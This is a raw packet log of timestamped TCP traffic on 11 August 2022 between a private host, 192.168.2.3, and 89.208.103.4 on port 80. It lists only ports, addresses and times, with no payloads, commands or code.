Aug 11, 2022 06:57:07.346776962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.346802950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.346849918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.347299099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.347840071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.347862959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.347883940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.347898006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.347919941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.347933054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348315001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348336935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348361969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348370075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348387003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348392963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348409891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348409891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348433971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348436117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348457098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348460913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348476887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348500013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348830938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348853111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348875046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348880053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348908901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348920107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348922014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348944902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348967075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.348978996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.348989964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349003077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349013090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349015951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349040031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349050999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349347115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349370003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349390984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349402905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349415064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349423885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349437952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.349440098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349467039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.349482059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.351471901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.351494074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.351516008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.351536989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.351548910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.351572990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.351602077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.351998091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352020979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352041960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352056026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352066040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352089882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352098942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352112055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352122068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352137089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352148056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352159023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352165937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352181911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352186918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352210999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352224112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352248907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352253914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352271080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352283955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352299929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352313995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352338076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352344036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352356911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352375984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352402925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352413893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352432013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352433920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352458000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352462053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352479935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352490902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352507114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352519989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352543116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352550030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352566957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352580070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352596045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352610111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352633953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352639914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352667093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352669001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.352691889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.352715015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.358855963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.358886003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.358915091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.358943939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.358947039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.358971119 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.358978033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.358978033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359004021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359008074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359020948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359040022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359066963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359071970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359086037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359102964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359129906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359132051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359147072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359162092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359188080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359194040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359206915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359224081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359250069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359255075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359285116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359287977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359299898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359313965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359332085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359344006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359376907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359392881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359419107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359420061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359446049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359452009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359456062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359482050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359510899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359510899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359539986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359549999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359571934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359571934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359601021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359603882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359627962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359632015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359656096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359662056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359688044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359692097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359723091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359724998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359749079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359750986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359760046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359781027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359810114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359814882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359838963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359843016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359867096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359869003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359889984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359899044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359924078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359927893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359944105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359957933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.359983921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.359986067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.360007048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.360016108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.360028028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.360045910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.360076904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.360101938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.360914946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.360944033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.360972881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.360985994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361001015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.361004114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361021996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361028910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.361057043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361058950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.361082077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361088991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.361097097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361119032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.361149073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.361155033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361171007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.361187935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.362485886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.362552881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.363548040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363576889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363605022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363611937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.363634109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363662004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363665104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.363693953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363696098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.363723040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.363730907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.363742113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.363775015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364586115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364617109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364641905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364645004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364669085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364674091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364696980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364703894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364717960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364732981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364752054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364763975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.364779949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.364816904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365086079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365113974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365139008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365159988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365639925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365657091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365685940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365693092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365715027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365719080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365741968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365744114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365758896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365775108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365801096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365803957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365819931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365833044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.365859985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.365879059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366684914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366714001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366740942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366744995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366761923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366770029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366794109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366800070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366816998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366831064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366847038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366859913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366889954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.366895914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366918087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.366935015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367746115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367775917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367806911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367827892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367835999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367842913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367861032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367866993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367889881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367897034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367928028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367927074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367940903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.367959023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.367983103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368005037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368805885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368837118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368865013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368879080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368894100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368896961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368922949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368923903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368942976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368953943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368976116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.368983984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.368999958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.369013071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.369030952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.369060040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372000933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372029066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372057915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372086048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372090101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372114897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372114897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372144938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372159958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372174978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372205019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372208118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372230053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372236013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372248888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372266054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372296095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372296095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372314930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372333050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372359991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372364044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372390985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372401953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372423887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372448921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372459888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372500896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372538090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.372539997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372569084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372577906 CEST	80	49736	89.208.103.4	192.168.2.3
